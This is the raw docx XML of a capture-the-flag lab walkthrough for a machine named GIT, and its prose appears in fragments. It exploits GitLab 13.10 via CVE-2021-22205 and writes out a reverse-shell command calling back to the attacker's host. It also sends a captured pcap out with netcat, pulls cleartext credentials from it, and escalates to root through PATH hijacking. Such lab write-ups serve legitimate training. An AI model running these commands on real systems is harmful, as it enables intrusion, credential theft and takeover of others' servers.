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md5x29xlq8di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6gjyyfwyiu02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ze4geo897axz" w:id="2"/>
      <w:bookmarkEnd w:id="2"/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GIT machine.If you require support, please open a ticket in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ejfsqcl4ijhy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Nmap Scan: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a first step, we need to determine which services are running in the background and which ports are open. Therefore, we will use a tool called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46200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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analyzing the Nmap output, we observed several open ports, including port 80, which is associated with a web service. Therefore, we can access it directly in our browser.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57500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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service on port 80, we identified that it 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GitLab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web platform for managing source code repositories, offering features such as version control, continuous integration, and collaboration between development teams. In the website footer, we can navigate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Explore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section and then select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What’s New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identify the GitLab version, which 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13.10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92300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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searching for exploits for this GitLab version, we found the following exploit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11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CVE-2021-22205</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId12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vulnerability was identified in GitLab CE/EE, affecting all versions starting from 11.9. GitLab failed to properly validate image files uploaded to a file analyzer, resulting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remote code execution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can clone the repository to our local machine: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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1143000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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cloning the repository, we can start a simple HTTP server using Python to verify execution of the PoC. Then, we send a cURL request to our server and, if the request is received correctly, we confirm that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remote command execution (RCE)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possible.</w:t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31900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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76300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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remote code execution confirmed, we can insert a reverse shell payload to obtain an interactive shell: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python3 exploit.py -t http://ip-machine -c "/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1'"</w:t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Netcat listener to receive the connection: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77900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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76400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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obtaining a shell, we need to perform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lateral movement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slavic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Accessing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/opt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directory, we found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.pcap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30300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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analyze it, we must transfer the file to our local machine. A simple way to do this is by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netcat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for file transfer.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On your local machine:</w:t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nc -lvnp 4445 &gt; file.pcap</w:t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On the target machine:</w:t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nc &lt;ip-vpn&gt; 4445 &lt; eth0-26082018.pcap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77900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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22300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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can then open the file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Wireshark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analyze the network traffic. To identify sensitive information such as credentials, follow these steps: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.pcap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in Wireshark.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Select any request in the displayed traffic.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Navigate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Follow → TCP Stream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 the context menu.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functionality allows viewing the complete communication between client and server, facilitating the identification of usernames, passwords, or other important data that may be transmitted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clear text.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01900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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performing this analysis, we can obtain the password of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slavic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82900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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password in hand, we can access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slavic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user and retrieve the first flag.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93800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Inside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scripts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directory, located in the home directory of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slavic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found a binary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 permissions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When executing the binary, we observed that it calls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28700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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Knowing this, we can transfer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binary to our local machine and perform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engineering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Ghidra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This analysis allows us to understand how the binary is executed and whether there is a possibility of exploiting it for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privilege escalation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44600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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06500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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opening the binary in Ghidra and navigating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Functions → main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found the code responsible for execution.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Analyzing the code, we quickly identified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Path Hijacking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vulnerability. This vulnerability occurs when a binary is called inside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function (or another function used to invoke operating system commands) without specifying the absolute path of the binary.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14700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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Based on this vulnerability, we can create a malicious file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and, inside it, invoke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Then, we export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$PATH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environment variable to include the directory where the malicious file is located.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way, when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binary is executed, it will first search for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binary in the directory specified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$PATH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executing our malicious file instead of the legitimate command. This allows us to escalate privileges, since the malicious file will spawn a shell with elevated permissions.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41400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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39800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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echo "/bin/bash" &gt; id</w:t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chmod +x id</w:t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export PATH=$(pwd):$PATH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Now execute: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./shell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doing so, we obtain a root shell.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accessing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directory, we can retrieve the final flag.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headerReference r:id="rId33" w:type="even"/>
      <w:footerReference r:id="rId34" w:type="default"/>
      <w:footerReference r:id="rId35" w:type="first"/>
      <w:footerReference r:id="rId36" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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All rights reserved </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve"> 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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="4"/>
    <w:bookmarkEnd w:id="4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58" name="image15.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image15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3">
    <w:pPr>
      <w:jc w:val="center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42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Git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0.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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2.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11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7.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Al1ex/CVE-2021-22205.git" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Al1ex/CVE-2021-22205.git" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17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jp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2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b+fNf/g29VriyxzQGkOku3aTUw==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLjZnanl5Znd5aXUwMjIOaC56ZTRnZW84OTdheHoyDmguZWpmc3FjbDRpamh5Mg5oLjE3NWY1Y3M5NHowbzgAciExbHpfYmdtMkN1Y1o0WEpyVkZlUm9vSEhyTU16UVNpSUs=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